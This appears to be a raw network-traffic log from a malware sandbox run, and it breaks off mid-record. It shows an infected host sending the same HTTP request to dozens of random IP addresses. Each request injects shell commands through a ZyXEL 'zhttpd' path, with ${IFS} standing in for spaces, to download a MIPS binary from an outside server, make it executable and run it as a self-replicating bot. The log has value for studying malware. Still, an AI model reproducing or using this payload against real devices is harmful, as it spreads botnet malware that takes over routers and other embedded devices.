                                          Jan 14, 2024 15:46:05.791423082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1943192.168.2.234668412.67.185.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791465998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1944192.168.2.2340536118.204.223.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791490078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1945192.168.2.2356524159.79.108.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791497946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1946192.168.2.235988441.60.250.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791522026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1947192.168.2.2344260161.166.125.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791580915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1948192.168.2.2345074111.198.141.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791615963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1949192.168.2.235353227.131.162.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791641951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1950192.168.2.2354196103.102.34.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791655064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1951192.168.2.236018249.236.109.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791707993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1952192.168.2.23594641.181.215.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791722059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1953192.168.2.2347026151.168.107.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791755915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1954192.168.2.234646850.180.162.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791780949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1955192.168.2.2357180172.147.140.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791836023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1956192.168.2.235059493.250.114.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791867018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1957192.168.2.2343398140.126.235.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791868925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1958192.168.2.233946653.97.230.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791886091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1959192.168.2.23459425.50.103.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791894913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1960192.168.2.2358884108.26.163.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791924953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1961192.168.2.234511643.97.16.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791950941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1962192.168.2.2334036221.57.0.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792007923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1963192.168.2.2347876205.181.247.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792042971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1964192.168.2.2334796149.45.103.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792078018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1965192.168.2.2358150182.182.171.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792105913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1966192.168.2.234454083.149.142.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792154074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1967192.168.2.2344410101.44.3.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792180061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1968192.168.2.2343148117.220.34.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792205095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1969192.168.2.233820651.90.109.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792248964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1970192.168.2.2352934186.67.95.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792284966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1971192.168.2.235360445.121.123.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792337894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1972192.168.2.234488066.177.35.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792386055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1973192.168.2.234836831.128.248.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792399883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1974192.168.2.2342986158.84.167.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792439938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1975192.168.2.2338486207.88.92.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792469978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1976192.168.2.2338680182.125.59.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792484045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1977192.168.2.2356916140.50.19.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792515993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1978192.168.2.2336104153.101.115.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792586088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1979192.168.2.2358364117.147.91.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792599916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1980192.168.2.234246091.236.143.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792603016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1981192.168.2.2347538150.226.195.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792637110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1982192.168.2.2332916186.247.169.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792670965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1983192.168.2.2342906188.224.105.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792706966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1984192.168.2.2355784102.99.226.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792745113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1985192.168.2.2338022205.98.127.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792757988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1986192.168.2.233849070.240.251.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792809963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1987192.168.2.2355494142.1.43.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792861938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1988192.168.2.235332292.178.216.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792901039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1989192.168.2.233681675.66.80.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792921066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1990192.168.2.235420293.212.213.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792948008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1991192.168.2.2350038198.103.129.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.792998075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1992192.168.2.2350624146.164.0.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793030977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1993192.168.2.235643251.191.201.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793059111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1994192.168.2.2335946223.66.7.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793102026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1995192.168.2.233600643.54.68.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793149948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1996192.168.2.2346574152.189.156.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793168068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1997192.168.2.2358602135.161.63.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793226957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1998192.168.2.2359830190.143.222.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793236017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1999192.168.2.234790847.188.144.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793273926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2000192.168.2.2351364161.52.194.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793284893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2001192.168.2.233582218.192.60.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793302059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2002192.168.2.2348282187.171.204.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793369055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2003192.168.2.2345860222.184.21.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793387890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2004192.168.2.23470648.201.4.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.793405056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2005192.168.2.234895623.60.14.20443
                                          TimestampBytes transferredDirectionData
